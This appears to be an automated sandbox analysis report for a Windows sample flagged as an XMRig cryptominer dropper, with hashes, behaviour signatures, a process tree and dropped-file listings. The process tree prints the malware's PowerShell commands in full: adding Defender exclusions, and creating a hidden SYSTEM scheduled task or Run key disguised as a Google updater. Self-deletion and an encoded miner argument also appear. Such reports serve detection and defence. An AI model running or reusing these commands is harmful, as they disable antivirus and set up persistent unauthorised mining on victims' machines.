Resubmissions

16/01/2024, 20:08

240116-yw17wshhcj 10

24/12/2023, 12:16

231224-pfqxjsebf4 10

07/09/2023, 19:19

230907-x1nxpadd73 10

07/09/2023, 19:17

230907-xzs51sdd58 10

28/08/2023, 15:19

230828-sqkeasca82 10

26/08/2023, 15:20

230826-sqw34add2s 10

20/08/2023, 00:23

230820-apgynscg55 10

Analysis

  • max time kernel
    1800s
  • max time network
    1805s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/08/2023, 15:19

General

  • Target

    qM5GMXBk6hJE6Y5e(13).exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3196
      • C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e(13).exe
        "C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e(13).exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3608
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e(13).exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3276
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:4548
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4468
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:2400
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2188
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:3672
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:4192
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:4608
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:4164
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:4260
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:4524
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1072

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Chrome\updater.exe

            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Libs\g.log

            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            cadef9abd087803c630df65264a6c81c

            SHA1

            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

            SHA256

            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

            SHA512

            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            1cadcf2205a1c9420626c70f4c1a89df

            SHA1

            8dfccee09ceb0a591ca490830f4bd5418da3db30

            SHA256

            e94a64d08ee13db57336774831f14c3c04d973e91017683b22960fe15e114b5e

            SHA512

            04628b8e8559bff687f09852e4ea00adb45054b6d84281e3b7e2a6574381cbdc2d2df260c764171892b2b9bef85a7a63e3dff9ded54331c2692b25f6c3076aa6

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jfab2o52.kmj.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/1072-121-0x00007FF7939A0000-0x00007FF793BB1000-memory.dmp

            Filesize

            2.1MB

          • memory/1072-54-0x00007FF7939A0000-0x00007FF793BB1000-memory.dmp

            Filesize

            2.1MB

          • memory/1072-111-0x00007FF7939A0000-0x00007FF793BB1000-memory.dmp

            Filesize

            2.1MB

          • memory/1556-0-0x00007FF6329E0000-0x00007FF632BF1000-memory.dmp

            Filesize

            2.1MB

          • memory/1556-36-0x00007FF6329E0000-0x00007FF632BF1000-memory.dmp

            Filesize

            2.1MB

          • memory/1556-31-0x00007FF6329E0000-0x00007FF632BF1000-memory.dmp

            Filesize

            2.1MB

          • memory/2188-78-0x000002D1CC370000-0x000002D1CC38C000-memory.dmp

            Filesize

            112KB

          • memory/2188-81-0x000002D1CC360000-0x000002D1CC368000-memory.dmp

            Filesize

            32KB

          • memory/2188-87-0x00007FFAFB0D0000-0x00007FFAFBB91000-memory.dmp

            Filesize

            10.8MB

          • memory/2188-84-0x000002D1C9C00000-0x000002D1C9C10000-memory.dmp

            Filesize

            64KB

          • memory/2188-83-0x000002D1CC3A0000-0x000002D1CC3AA000-memory.dmp

            Filesize

            40KB

          • memory/2188-82-0x000002D1CC390000-0x000002D1CC396000-memory.dmp

            Filesize

            24KB

          • memory/2188-80-0x000002D1CC3B0000-0x000002D1CC3CA000-memory.dmp

            Filesize

            104KB

          • memory/2188-79-0x000002D1CC350000-0x000002D1CC35A000-memory.dmp

            Filesize

            40KB

          • memory/2188-77-0x000002D1CC200000-0x000002D1CC20A000-memory.dmp

            Filesize

            40KB

          • memory/2188-68-0x00007FF48E0D0000-0x00007FF48E0E0000-memory.dmp

            Filesize

            64KB

          • memory/2188-76-0x000002D1CC120000-0x000002D1CC13C000-memory.dmp

            Filesize

            112KB

          • memory/2188-65-0x000002D1C9C00000-0x000002D1C9C10000-memory.dmp

            Filesize

            64KB

          • memory/2188-64-0x00007FFAFB0D0000-0x00007FFAFBB91000-memory.dmp

            Filesize

            10.8MB

          • memory/3608-19-0x0000027A17320000-0x0000027A17330000-memory.dmp

            Filesize

            64KB

          • memory/3608-32-0x0000027A17320000-0x0000027A17330000-memory.dmp

            Filesize

            64KB

          • memory/3608-20-0x0000027A17320000-0x0000027A17330000-memory.dmp

            Filesize

            64KB

          • memory/3608-34-0x00007FFAFB1C0000-0x00007FFAFBC81000-memory.dmp

            Filesize

            10.8MB

          • memory/3608-18-0x00007FFAFB1C0000-0x00007FFAFBC81000-memory.dmp

            Filesize

            10.8MB

          • memory/3672-113-0x000002067F4F0000-0x000002067F500000-memory.dmp

            Filesize

            64KB

          • memory/3672-101-0x00007FF425370000-0x00007FF425380000-memory.dmp

            Filesize

            64KB

          • memory/3672-112-0x000002067F4F0000-0x000002067F500000-memory.dmp

            Filesize

            64KB

          • memory/3672-115-0x00007FFAFB0D0000-0x00007FFAFBB91000-memory.dmp

            Filesize

            10.8MB

          • memory/3672-100-0x000002067F4F0000-0x000002067F500000-memory.dmp

            Filesize

            64KB

          • memory/3672-98-0x00007FFAFB0D0000-0x00007FFAFBB91000-memory.dmp

            Filesize

            10.8MB

          • memory/4192-127-0x00007FF7A6EF0000-0x00007FF7A6F06000-memory.dmp

            Filesize

            88KB

          • memory/4192-137-0x00007FF7A6EF0000-0x00007FF7A6F06000-memory.dmp

            Filesize

            88KB

          • memory/4468-50-0x000002233FB50000-0x000002233FB60000-memory.dmp

            Filesize

            64KB

          • memory/4468-53-0x00007FFAFB1C0000-0x00007FFAFBC81000-memory.dmp

            Filesize

            10.8MB

          • memory/4468-39-0x000002233FB50000-0x000002233FB60000-memory.dmp

            Filesize

            64KB

          • memory/4468-38-0x000002233FB50000-0x000002233FB60000-memory.dmp

            Filesize

            64KB

          • memory/4468-37-0x00007FFAFB1C0000-0x00007FFAFBC81000-memory.dmp

            Filesize

            10.8MB

          • memory/4524-138-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-146-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-119-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-120-0x000002718F3D0000-0x000002718F3F0000-memory.dmp

            Filesize

            128KB

          • memory/4524-190-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-188-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-186-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-125-0x000002718F8F0000-0x000002718F930000-memory.dmp

            Filesize

            256KB

          • memory/4524-126-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-184-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-128-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-130-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-131-0x000002718F930000-0x000002718F950000-memory.dmp

            Filesize

            128KB

          • memory/4524-132-0x000002718F950000-0x000002718F970000-memory.dmp

            Filesize

            128KB

          • memory/4524-134-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-135-0x000002718F930000-0x000002718F950000-memory.dmp

            Filesize

            128KB

          • memory/4524-136-0x000002718F950000-0x000002718F970000-memory.dmp

            Filesize

            128KB

          • memory/4524-144-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-182-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-140-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-180-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-142-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-174-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-148-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-150-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-152-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-154-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-156-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-158-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-160-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-162-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-164-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-166-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-168-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-170-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/4524-172-0x00007FF6150D0000-0x00007FF6158C4000-memory.dmp

            Filesize

            8.0MB

          • memory/5028-1-0x000001D873860000-0x000001D873882000-memory.dmp

            Filesize

            136KB

          • memory/5028-15-0x000001D8716B0000-0x000001D8716C0000-memory.dmp

            Filesize

            64KB

          • memory/5028-17-0x00007FFAFB1C0000-0x00007FFAFBC81000-memory.dmp

            Filesize

            10.8MB

          • memory/5028-11-0x00007FFAFB1C0000-0x00007FFAFBC81000-memory.dmp

            Filesize

            10.8MB

          • memory/5028-12-0x000001D8716B0000-0x000001D8716C0000-memory.dmp

            Filesize

            64KB

          • memory/5028-13-0x000001D8716B0000-0x000001D8716C0000-memory.dmp

            Filesize

            64KB

          • memory/5028-14-0x000001D8716B0000-0x000001D8716C0000-memory.dmp

            Filesize

            64KB